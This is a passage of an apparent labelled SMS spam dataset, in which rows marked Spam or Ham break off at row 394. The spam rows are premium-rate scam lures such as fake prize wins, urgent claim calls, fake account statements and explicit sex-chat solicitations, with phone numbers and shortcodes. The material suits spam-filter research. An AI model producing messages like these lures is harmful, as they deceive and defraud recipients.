Spam FreeMsg Today's the day if you are ready! I'm horny & live in your town. I love sex fun & games! Netcollex Ltd 08700621170150p per msg reply Stop to end 114 | Ham Have you heard from this week? 115 | Spam CLAIRE here am havin borin time & am now alone U wanna cum over 2nite? Chat now 09099725823 hope 2 C U Luv CLAIRE xx Calls£1/minmoremobsEMSPOBox45PO139WA 116 | Spam Romantic Paris. 2 nights, 2 flights from £79 Book now 4 next year. Call 08704439680Ts&Cs apply. 117 | Ham Talk to g and x about that 118 | Ham Go until jurong point, crazy.. Available only in bugis n great world la e buffet... Cine there got amore wat... 119 | Ham K then 2marrow are you coming to class. 
120 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX 121 | Spam Dear Voucher Holder, To claim this weeks offer, at your PC please go to http://www.wtlp.co.uk/text. Ts&Cs apply. 122 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription 123 | Spam Married local women looking for discreet action now! 5 real matches instantly to your phone. Text MATCH to 69969 Msg cost 150p 2 stop txt stop BCMSFWC1N3XX 124 | Spam Someone has conacted our dating service and entered your phone because they fancy you!To find out who it is call from landline 09111030116. PoBox12n146tf15 125 | Ham Shhhhh nobody is supposed to know! 126 | Ham I'm home. Doc gave me pain meds says everything is fine. 127 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer 128 | Ham how tall are you princess? 129 | Ham What time. I‘m out until prob 3 or so 130 | Spam Knock Knock Txt whose there to 80082 to enter r weekly draw 4 a £250 gift voucher 4 a store of yr choice. T&Cs www.tkls.com age16 to stoptxtstop£1.50/week 131 | Ham Love you aathi..love u lot.. 132 | Spam sexy sexy cum and text me im wet and warm and ready for some porn! u up for some fun? THIS MSG IS FREE RECD MSGS 150P INC VAT 2 CANCEL TEXT STOP 133 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now! 134 | Spam Do you want a new Video handset? 750 any time any network mins? UNLIMITED TEXT? Camcorder? Reply or Call now 08000930705 for del Sat AM 135 | Ham Nothin comes to my mind. Ü help me buy hanger lor. Ur laptop not heavy? 136 | Ham Long beach lor. Expected... U having dinner now? 
137 | Ham Talk With Yourself Atleast Once In A Day...!!! Otherwise You Will Miss Your Best FRIEND In This WORLD...!!! -Shakespeare- SHESIL <#> 138 | Ham A little. Meds say take once every 8 hours. It's only been 5 but pain is back. So I took another. Hope I don't die 139 | Ham Its like that hotel dusk game i think. You solve puzzles in a area thing 140 | Spam Want a new Video Phone? 750 anytime any network mins? Half price line rental free text for 3 months? Reply or call 08000930705 for free delivery 141 | Spam EASTENDERS TV Quiz. What FLOWER does DOT compare herself to? D= VIOLET E= TULIP F= LILY txt D E or F to 84025 NOW 4 chance 2 WIN £100 Cash WKENT/150P16+ 142 | Ham Beerage? 143 | Ham V nice! Off 2 sheffield tom 2 air my opinions on categories 2 b used 2 measure ethnicity in next census. Busy transcribing. :-) 144 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country the Algarve is in? Txt ansr to 82277. £1.50 SP:Tyrone 145 | Spam From next month get upto 50% More Calls 4 Ur standard network charge 2 activate Call 9061100010 C Wire3.net 1st4Terms PoBox84 M26 3UZ Cost £1.50 min MobcudB more 146 | Ham Fuck babe ... I miss you already, you know ? Can't you let me send you some money towards your net ? I need you ... I want you ... I crave you ... 147 | Ham Mm you ask him to come its enough :-) 148 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790121 from land line. Claim 3030. Valid 12hrs only 150ppm 149 | Ham Am in gobi arts college 150 | Spam Thank you, winner notified by sms. Good Luck! No future marketing reply STOP to 84122 customer services 08450542832 151 | Ham She's fine. Good to hear from you. How are you my dear? Happy new year oh. 152 | Spam URGENT! Your Mobile number has been awarded with a £2000 Bonus Caller Prize. Call 09058095201 from land line. Valid 12hrs only 153 | Spam Claim a 200 shopping spree, just call 08717895698 now! Have you won! 
MobStoreQuiz10ppm 154 | Spam U’ve Bin Awarded £50 to Play 4 Instant Cash. Call 08715203028 To Claim. EVERY 9th Player Wins Min £50-£500. OptOut 08718727870 155 | Spam Please CALL 08712402578 immediately as there is an urgent message waiting for you 156 | Spam +123 Congratulations - in this week's competition draw u have won the £1450 prize to claim just call 09050002311 b4280703. T&Cs/stop SMS 08718727868. Over 18 only 150ppm 157 | Ham It should take about <#> min 158 | Spam Sex up ur mobile with a FREE sexy pic of Jordan! Just text BABE to 88600. Then every wk get a sexy celeb! PocketBabe.co.uk 4 more pics. 16 £3/wk 087016248 159 | Spam January Male Sale! Hot Gay chat now cheaper, call 08709222922. National rate from 1.5p/min cheap to 7.8p/min peak! To stop texts call 08712460324 (10p/min) 160 | Spam Double Mins & Double Txt & 1/2 price Linerental on Latest Orange Bluetooth mobiles. Call MobileUpd8 for the very latest offers. 08000839402 or call2optout/LF56 161 | Ham Thanks love. But am i doing torch or bold. 162 | Ham We have all rounder:)so not required:) 163 | Ham What you did in leave. 164 | Ham Which is weird because I know I had it at one point 165 | Ham I sent you the prices and do you mean the <#> g, 166 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY 167 | Ham Company is very good.environment is terrific and food is really nice:) 168 | Ham Arun can u transfr me d amt 169 | Ham Where to get those? 170 | Ham I dont thnk its a wrong calling between us 171 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH. 172 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize! 173 | Spam Cashbin.co.uk (Get lots of cash this weekend!) 
www.cashbin.co.uk Dear Welcome to the weekend We have got our biggest and best EVER cash give away!! These.. 174 | Spam Sunshine Quiz! Win a super Sony DVD recorder if you canname the capital of Australia? Text MQUIZ to 82277. B 175 | Ham Mmmmmmm *snuggles into you* ...*deep contented sigh* ... *whispers* ... I fucking love you so much I can barely stand it ... 176 | Spam Wan2 win a Meet+Greet with Westlife 4 U or a m8? They are currently on what tour? 1)Unbreakable, 2)Untamed, 3)Unkempt. Text 1,2 or 3 to 83049. Cost 50p +std text 177 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription 178 | Ham We have sent JD for Customer Service cum Accounts Executive to ur mail id, For details contact us 179 | Spam tells u 2 call 09066358152 to claim £5000 prize. U have 2 enter all ur mobile & personal details @ the prompts. Careful! 180 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094599 181 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also? 182 | Ham Okie 183 | Ham Dai <#> naal eruku. 184 | Spam FREE GAME. Get Rayman Golf 4 FREE from the O2 Games Arcade. 1st get UR games settings. Reply POST, then save & activ8. Press 0 key for Arcade. Termsapply 185 | Spam YOU HAVE WON! As a valued Vodafone customer our computer has picked YOU to win a £150 prize. To collect is easy. Just call 09061743386 186 | Ham You've already got a flaky parent. It'snot supposed to be the child's job to support the parent...not until they're The Ride age anyway. I'm supposed to be there to support you. And now i've hurt you. 187 | Ham Easy mate, * guess the quick drink was bit ambitious. 188 | Spam Save money on wedding lingerie at www.bridal.petticoatdreams.co.uk Choose from a superb selection with national delivery. 
Brought to you by WeddingFriend 189 | Ham U so lousy, run already come back then half dead... Hee... 190 | Ham Yup song bro. No creative. Neva test quality. He said check review online. 191 | Spam Do you want 750 anytime any network mins 150 text and a NEW VIDEO phone for only five pounds per week call 08002888812 or reply for delivery tomorrow 192 | Ham Petey boy whereare you me and all your friendsare in theKingshead come down if you canlove Nic 193 | Spam * FREE* POLYPHONIC RINGTONE Text SUPER to 87131 to get your FREE POLY TONE of the week now! 16 SN PoBox202 NR31 7ZS subscription 450pw 194 | Spam The current leading bid is 151. To pause this auction send OUT. Customer Care: 08718726270 195 | Spam Ever thought about living a good life with a perfect partner? Just txt back NAME and AGE to join the mobile community. (100p/SMS) 196 | Ham "Beautiful Truth against Gravity.. Read carefully: ""Our heart feels light when someone is in it.. But it feels very heavy when someone leaves it.."" GOODMORNING" 197 | Spam You will recieve your tone within the next 24hrs. For Terms and conditions please see Channel U Teletext Pg 750 198 | Spam Urgent Urgent! We have 800 FREE flights to Europe to give away, call B4 10th Sept & take a friend 4 FREE. Call now to claim on 09050000555. BA128NNFWFLY150ppm 199 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update VCo FREE on 08002986906 200 | Ham "Feb <#> is ""I LOVE U"" day. Send dis to all ur ""VALUED FRNDS"" evn me. If 3 comes back u'll gt married d person u luv! If u ignore dis u will lose ur luv 4 Evr" 201 | Ham Oh ho. Is this the first time u use these type of words 202 | Spam Ur balance is now £600. Next question: Complete the landmark, Big, A. Bob, B. Barry or C. Ben ?. Text A, B or C to 83738. Good luck! 203 | Ham I cant pick the phone right now. Pls send a message 204 | Spam Bored housewives! Chat n date now! 0871750.77.11! 
BT-national rate 10p/min only from landlines! 205 | Ham <#> in mca. But not conform. 206 | Ham The greatest test of courage on earth is to bear defeat without losing heart....gn tc 207 | Ham That means you got an A in epi, she.s fine. She.s here now. 208 | Ham K ill drink.pa then what doing. I need srs model pls send it to my mail id pa. 209 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 210 | Spam This is the 2nd time we have tried 2 contact u. U have won the 750 Pound prize. 2 claim is easy, call 08712101358 NOW! Only 10p per min. BT-national-rate 211 | Spam For taking part in our mobile survey yesterday! You can now have 500 texts 2 use however you wish. 2 get txts just send TXT to 80160 T&C www.txt43.com 1.50p 212 | Ham Sorry i'm not free... 213 | Spam Get your garden ready for summer with a FREE selection of summer bulbs and seeds worth £33:50 only with The Scotsman this Saturday. To stop go2 notxt.co.uk 214 | Spam You have 1 new message. Please call 08712400200. 215 | Spam RT-KIng Pro Video Club>> Need help? info@ringtoneking.co.uk or call 08701237397 You must be 16+ Club credits redeemable at www.ringtoneking.co.uk! Enjoy! 216 | Ham Jay wants to work out first, how's 4 sound? 217 | Spam FreeMsg: Txt: CALL to No: 86888 & claim your reward of 3 hours talk time to use from your phone now! Subscribe6GBP/mnth inc 3hrs 16 stop?txtStop 218 | Ham Oh ok.. 219 | Spam PRIVATE! Your 2004 Account Statement for 078498****7 shows 786 unredeemed Bonus Points. To claim call 08719180219 Identifier Code: 45239 Expires 06.05.05 220 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16 221 | Ham Dude u knw also telugu..thts gud..k, gud nyt.. 222 | Spam Double Mins & 1000 txts on Orange tariffs. 
Latest Motorola, SonyEricsson & Nokia with Bluetooth FREE! Call MobileUpd8 on 08000839402 or call2optout/HF8 223 | Spam FreeMsg Hey U, i just got 1 of these video/pic fones, reply WILD to this txt & ill send U my pics, hurry up Im so bored at work xxx (18 150p/rcvd STOP2stop) 224 | Spam Block Breaker now comes in deluxe format with new features and great graphics from T-Mobile. Buy for just £5 by replying GET BBDELUXE and take the challenge 225 | Ham Yar lor... How u noe? U used dat route too? 226 | Spam Latest News! Police station toilet stolen, cops have nothing to go on! 227 | Spam FREE NOKIA Or Motorola with upto 12mths 1/2price linerental, 500 FREE x-net mins&100txt/mth FREE B'tooth*. Call Mobileupd8 on 08001950382 or call 2optout/D3WV 228 | Spam Hi its LUCY Hubby at meetins all day Fri & I will B alone at hotel U fancy cumin over? Pls leave msg 2day 09099726395 Lucy x Calls£1/minMobsmoreLKPOBOX177HP51FL 229 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days. 230 | Ham Sorry, I'll call later in meeting. 231 | Ham K...k:)why cant you come here and search job:) 232 | Spam FREE>Ringtone! Reply REAL or POLY eg REAL1 1. PushButton 2. DontCha 3. BabyGoodbye 4. GoldDigger 5. WeBeBurnin 1st tone FREE and 6 more when u join for £3/wk 233 | Spam Hungry gay guys feeling hungry and up 4 it, now. Call 08718730555 just 10p/min. To stop texts call 08712460324 (10p/min) 234 | Ham How are you, my Love ? Are you with your brother ? Time to talk english with him ? *grins* Say : Hey Muhommad, Penny says hello from across the sea 235 | Spam wamma get laid?want real doggin locations sent direct to your mobile? join the UKs largest dogging network. txt dogs to 69696 now!nyt. ec2a. 3lp £1.50/msg. 236 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18 237 | Ham Shant disturb u anymore... Jia you... 
238 | Spam Want 2 get laid tonight? Want real Dogging locations sent direct 2 ur mob? Join the UK's largest Dogging Network bt Txting GRAVEL to 69888! Nt. ec2a. 31p.msg@150p 239 | Spam Auction round 4. The highest bid is now £54. Next maximum bid is £71. To bid, send BIDS e. g. 10 (to bid £10) to 83383. Good luck. 240 | Spam XMAS Prize draws! We are trying to contact U. Todays draw shows that you have won a £2000 prize GUARANTEED. Call 09058094565 from land line. Valid 12hrs only 241 | Spam This message is brought to you by GMW Ltd. and is not connected to the 242 | Ham Hello! Good week? Fancy a drink or something later? 243 | Ham :) 244 | Ham Babe ! What are you doing ? Where are you ? Who are you talking to ? Do you think of me ? Are you being a good boy? Are you missing me? Do you love me ? 245 | Ham OH FUCK. JUSWOKE UP IN A BED ON A BOATIN THE DOCKS. SLEPT WID 25 YEAR OLD. SPINOUT! GIV U DA GOSSIP L8R. XXX 246 | Ham Sorry * was at the grocers. 247 | Ham How abt making some of the pics bigger? 248 | Ham Its ok..come to my home it vl nice to meet and v can chat.. 249 | Ham aathi..where are you dear.. 250 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+ 251 | Ham It wont b until 2.15 as trying 2 sort house out, is that ok? 252 | Spam Thanks for the Vote. Now sing along with the stars with Karaoke on your mobile. For a FREE link just reply with SING now. 253 | Spam I am hot n horny and willing I live local to you - text a reply to hear strt back from me 150p per msg Netcollex LtdHelpDesk: 02085076972 reply Stop to end 254 | Spam I want some cock! My hubby's away, I need a real man 2 satisfy me. Txt WIFE to 89938 for no strings action. (Txt STOP 2 end, txt rec £1.50ea. OTBox 731 LA1 7WS. ) 255 | Spam FREE for 1st week! 
No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+ 256 | Spam Summers finally here! Fancy a chat or flirt with sexy singles in yr area? To get MATCHED up just reply SUMMER now. Free 2 Join. OptOut txt STOP Help08714742804 257 | Ham How much it will cost approx . Per month. 258 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award 259 | Spam Please call our customer service representative on FREEPHONE 0808 145 4742 between 9am-11pm as you have WON a guaranteed £1000 cash or £5000 prize! 260 | Ham So many people seems to be special at first sight, But only very few will remain special to you till your last sight.. Maintain them till life ends.. Sh!jas 261 | Ham We stopped to get ice cream and will go back after 262 | Ham No da..today also i forgot.. 263 | Ham Good morning princess! Have a great day! 264 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone 265 | Spam Your account has been credited with 500 FREE Text Messages. To activate, just txt the word: CREDIT to No: 80488 T&Cs www.80488.biz 266 | Ham K..then come wenever u lik to come and also tel vikky to come by getting free time..:-) 267 | Ham Cant think of anyone with * spare room off * top of my head 268 | Ham There's no point hangin on to mr not right if he's not makin u happy 269 | Ham Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out. 270 | Ham We don call like <#> times oh. No give us hypertension oh. 271 | Spam PRIVATE! Your 2003 Account Statement for 07973788240 shows 800 un-redeemed S. I. M. points. 
Call 08715203649 Identifier Code: 40533 Expires 31/10/04 272 | Ham Dear,Me at cherthala.in case u r coming cochin pls call bfore u start.i shall also reach accordingly.or tell me which day u r coming.tmorow i am engaged ans its holiday. 273 | Ham Yo, you gonna still be in stock tomorrow/today? I'm trying to get a dubsack 274 | Spam Last chance 2 claim ur £150 worth of discount vouchers-Text YES to 85023 now!SavaMob-member offers mobile T Cs 08717898035. £3.00 Sub. 16 . Remove txt X or STOP 275 | Spam URGENT! We are trying to contact U. Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050001808 from land line. Claim M95. Valid12hrs only 276 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S.I.M. points. Call 08718738001 Identifier Code: 49557 Expires 26/11/04 277 | Ham Havent. 278 | Spam Collect your VALENTINE'S weekend to PARIS inc Flight & Hotel + £200 Prize guaranteed! Text: PARIS to No: 69101. www.rtf.sphosting.com 279 | Ham Hope you’re not having too much fun without me!! see u tomorrow love jess x 280 | Spam Final Chance! Claim ur £150 worth of discount vouchers today! Text YES to 85023 now! SavaMob, member offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Subs 16 281 | Ham My drive can only be read. I need to write 282 | Spam Dear U've been invited to XCHAT. This is our final attempt to contact u! Txt CHAT to 86688 150p/MsgrcvdHG/Suite342/2Lands/Row/W1J6HL LDN 18 yrs 283 | Ham Sorry, I'll call later 284 | Ham Nowadays people are notixiquating the laxinorficated opportunity for bambling of entropication.... Have you ever oblisingately opted ur books for the masteriastering amplikater of fidalfication? It is 285 | Ham Ok. No wahala. Just remember that a friend in need ... 286 | Spam UpgrdCentre Orange customer, you may now claim your FREE CAMERA PHONE upgrade for your loyalty. Call now on 0207 153 9153. Offer ends 26th July. T&C's apply. 
Opt-out available 287 | Ham Am slow in using biola's fne 288 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u? 289 | Ham From here after The performance award is calculated every two month.not for current one month period.. 290 | Spam Good Luck! Draw takes place 28th Feb 06. Good Luck! For removal send STOP to 87239 customer services 08708034412 291 | Spam Urgent! Please call 09061213237 from landline. £5000 cash or a luxury 4* Canary Islands Holiday await collection. T&Cs SAE PO Box 177. M227XY. 150ppm. 16+ 292 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 293 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ 294 | Ham Wife.how she knew the time of murder exactly 295 | Ham Oooh bed ridden ey? What are YOU thinking of? 296 | Spam Back 2 work 2morro half term over! Can U C me 2nite 4 some sexy passion B4 I have 2 go back? Chat NOW 09099726481 Luv DENA Calls £1/minMobsmoreLKPOBOX177HP51FL 297 | Spam Ur ringtone service has changed! 25 Free credits! Go to club4mobiles.com to choose content now! Stop? txt CLUB STOP to 87070. 150p/wk Club4 PO Box1146 MK45 2WT 298 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ? 299 | Spam Win a £1000 cash prize or a prize worth £5000 300 | Spam PRIVATE! Your 2004 Account Statement for 07742676969 shows 786 unredeemed Bonus Points. To claim call 08719180248 Identifier Code: 45239 Expires 301 | Spam Wanna have a laugh? Try CHIT-CHAT on your mobile now! Logon by txting the word: CHAT and send it to No: 8883 CM PO Box 4217 London W1A 6ZF 16+ 118p/msg rcvd 302 | Spam Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. £3.00 Sub. 16 . 
Unsub reply X 303 | Ham Still work going on:)it is very small house. 304 | Spam money!!! you r a lucky winner ! 2 claim your prize text money 2 88600 over £1million to give away ! ppt150x3+normal text rate box403 w1t1jy 305 | Ham Some of them told accenture is not confirm. Is it true. 306 | Ham I am taking half day leave bec i am not well 307 | Spam 87077: Kick off a new season with 2wks FREE goals & news to ur mobile! Txt ur club name to 87077 eg VILLA to 87077 308 | Ham Good sleep is about rhythm. The person has to establish a rhythm that the body will learn and use. If you want to know more :-) 309 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 310 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply.. 311 | Ham Nope thats fine. I might have a nap tho! 312 | Ham Ok u can take me shopping when u get paid =D 313 | Spam Money i have won wining number 946 wot do i do next 314 | Ham Mm feeling sleepy. today itself i shall get that dear 315 | Ham 7 lor... Change 2 suntec... Wat time u coming? 316 | Ham Beautiful tomorrow never comes.. When it comes, it's already TODAY.. In the hunt of beautiful tomorrow don't waste your wonderful TODAY.. GOODMORNING:) 317 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime any networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW 318 | Spam U 447801259231 have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094597 319 | Spam Hello darling how are you today? I would love to have a chat, why dont you tell me what you look like and what you are in to sexy? 320 | Ham Have you finished work yet? :) 321 | Ham I guess you could be as good an excuse as any, lol. 322 | Spam URGENT! 
Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09058094455 from land line. Claim 3030. Valid 12hrs only 323 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW 324 | Ham Gokila is talking with you aha:) 325 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712379 between 10am-7pm Cost 10p 326 | Spam "Free Msg: get Gnarls Barkleys ""Crazy"" ringtone TOTALLY FREE just reply GO to this message right now!" 327 | Ham That's good. Lets thank God. Please complete the drug. Have lots of water. And have a beautiful day. 328 | Ham Just sent it. So what type of food do you like? 329 | Spam Talk sexy!! Make new friends or fall in love in the worlds most discreet text dating service. Just text VIP to 83110 and see who you could meet. 330 | Ham Having lunch:)you are not in online?why? 331 | Spam We currently have a message awaiting your collection. To collect your message just call 08718723815. 332 | Spam YOUR CHANCE TO BE ON A REALITY FANTASY SHOW call now = 08707509020 Just 20p per min NTT Ltd, PO Box 1327 Croydon CR9 5WB 0870 is a national = rate call. 333 | Ham Tired. I haven't slept well the past few nights. 334 | Ham Any chance you might have had with me evaporated as soon as you violated my privacy by stealing my phone number from your employer's paperwork. Not cool at all. Please do not contact me again or I wil 335 | Spam Burger King - Wanna play footy at a top stadium? Get 2 Burger King before 1st Sept and go Large or Super with Coca-Cola and walk out a winner 336 | Ham Oops. 4 got that bit. 337 | Ham No message..no responce..what happend? 338 | Ham Dont search love, let love find U. Thats why its called falling in love, bcoz U dont force yourself, U just fall and U know there is smeone to hold U... BSLVYL 339 | Spam Hi babe its Chloe, how r u? 
I was smashed on saturday night, it was great! How was your weekend? U been missing me? SP visionsms.com Text stop to stop 150p/text 340 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU 341 | Spam "You have been specially selected to receive a ""3000 award! Call 08712402050 BEFORE the lines close. Cost 10ppm. 16+. T&Cs apply. AG Promo" 342 | Ham Good afternoon, my love! How goes that day ? I hope maybe you got some leads on a job. I think of you, boytoy and send you a passionate kiss from across the sea 343 | Ham If you don't respond imma assume you're still asleep and imma start calling n shit 344 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 345 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058097189 NOW all will be revealed. POBox 6, LS15HB 150p 346 | Spam How come it takes so little time for a child who is afraid of the dark to become a teenager who wants to stay out all night? 347 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S. I. M. points. Call 08715203656 Identifier Code: 42049 Expires 26/10/04 348 | Spam SMS. ac JSco: Energy is high, but u may not know where 2channel it. 2day ur leadership skills r strong. Psychic? Reply ANS w/question. End? Reply END JSCO 349 | Spam URGENT! Your mobile No *********** WON a £2,000 Bonus Caller Prize on 02/06/03! This is the 2nd attempt to reach YOU! Call 09066362220 ASAP! BOX97N7QP, 150ppm 350 | Ham U wan 2 haf lunch i'm in da canteen now. 351 | Ham I can’t wait for cornwall. Hope tonight isn’t too bad as well but it’s rock night shite. Anyway i’m going for a kip now have a good night. Speak to you soon. 352 | Spam PRIVATE! Your 2003 Account Statement for 07808247860 shows 800 un-redeemed S. I. M. points. 
Call 08719899229 Identifier Code: 40411 Expires 06/11/04 353 | Spam New Tones This week include: 1)McFly-All Ab.., 2) Sara Jorge-Shock.. 3) Will Smith-Switch.. To order follow instructions on next message 354 | Spam You are being ripped off! Get your mobile content from www.clubmoby.com call 08717509990 poly/true/Pix/Ringtones/Games six downloads for only 3 355 | Spam This weeks SavaMob member offers are now accessible. Just call 08709501522 for details! SavaMob, POBOX 139, LA3 2WU. Only £1.50/week. SavaMob - offers mobile! 356 | Ham Daddy, shu shu is looking 4 u... U wan me 2 tell him u're not in singapore or wat? 357 | Ham No..few hours before.went to hair cut . 358 | Ham Yes baby! We can study all the positions of the kama sutra ;) 359 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever.... 360 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222. 361 | Ham I think just yourself …Thanks and see you tomo 362 | Spam SIX chances to win CASH! From 100 to 20,000 pounds txt> CSH11 and send to 87575. Cost 150p/day, 6days, 16+ TsandCs apply Reply HL 4 info 363 | Ham All these nice new shirts and the only thing I can wear them to is nudist themed ;_; you in mu? 364 | Ham X2 <#> . Are you going to get that 365 | Ham HI HUN! IM NOT COMIN 2NITE-TELL EVERY1 IM SORRY 4 ME, HOPE U AVA GOODTIME!OLI RANG MELNITE IFINK IT MITE B SORTED,BUT IL EXPLAIN EVERYTHIN ON MON.L8RS.x 366 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!! 367 | Spam England v Macedonia - dont miss the goals/team news. Txt ur national team to 87077 eg ENGLAND to 87077 Try:WALES, SCOTLAND 4txt/ú1.20 POBOXox36504W45WQ 16+ 368 | Ham Hello, my love! How goes that day ? I wish your well and fine babe and hope that you find some job prospects. I miss you, boytoy ... 
*a teasing kiss* 369 | Spam Hi 07734396839 IBH Customer Loyalty Offer: The NEW NOKIA6600 Mobile from ONLY £10 at TXTAUCTION!Txt word:START to No:81151 & get Yours Now!4T& 370 | Spam Had your mobile 10 mths? Update to the latest Camera/Video phones for FREE. KEEP UR SAME NUMBER, Get extra free mins/texts. Text YES for a call 371 | Ham U too... 372 | Spam BangBabes Ur order is on the way. U SHOULD receive a Service Msg 2 download UR content. If U do not, GoTo wap. bangb. tv on UR mobile internet/service menu 373 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come... 374 | Spam Great NEW Offer - DOUBLE Mins & DOUBLE Txt on best Orange tariffs AND get latest camera phones 4 FREE! Call MobileUpd8 free on 08000839402 NOW! or 2stoptxt T&Cs 375 | Ham "Painful words- ""I thought being Happy was the most toughest thing on Earth... But, the toughest is acting Happy with all unspoken pain inside..""" 376 | Spam Marvel Mobile Play the official Ultimate Spider-man game (£4.50) on ur mobile right now. Text SPIDER to 83338 for the game & we ll send u a FREE 8Ball wallpaper 377 | Ham The affidavit says <#> E Twiggs St, division g, courtroom <#> , <TIME> AM. I'll double check and text you again tomorrow 378 | Ham New Theory: Argument wins d SITUATION, but loses the PERSON. So dont argue with ur friends just.. . . . kick them & say, I'm always correct.! 379 | Ham K, my roommate also wants a dubsack and another friend may also want some so plan on bringing extra, I'll tell you when they know for sure 380 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030 381 | Spam thesmszone.com lets you send free anonymous and masked messages..im sending this message from there..do you see the potential for abuse??? 
382 | Ham Yar lor he wan 2 go c horse racing today mah, so eat earlier lor. I ate chicken rice. U? 383 | Ham Lol enjoy role playing much? 384 | Ham Pls speak to that customer machan. 385 | Spam TheMob> Check out our newest selection of content, Games, Tones, Gossip, babes and sport, Keep your mobile fit and funky text WAP to 82468 386 | Spam "SMS. ac sun0819 posts HELLO:""You seem cool, wanted to say hi. HI!!!"" Stop? Send STOP to 62468" 387 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update Co FREE on 08002986906 388 | Ham Faith makes things possible,Hope makes things work,Love makes things beautiful,May you have all three this Christmas!Merry Christmas! 389 | Ham Thank you. I like you as well... 390 | Ham I need... Coz i never go before 391 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18 TXTAUCTION 392 | Ham Mm that time you dont like fun 393 | Spam 1000's flirting NOW! Txt GIRL or BLOKE & ur NAME & AGE, eg GIRL ZOE 18 to 8007 to join and get chatting! 394 | Ham Haha awesome, I've been to 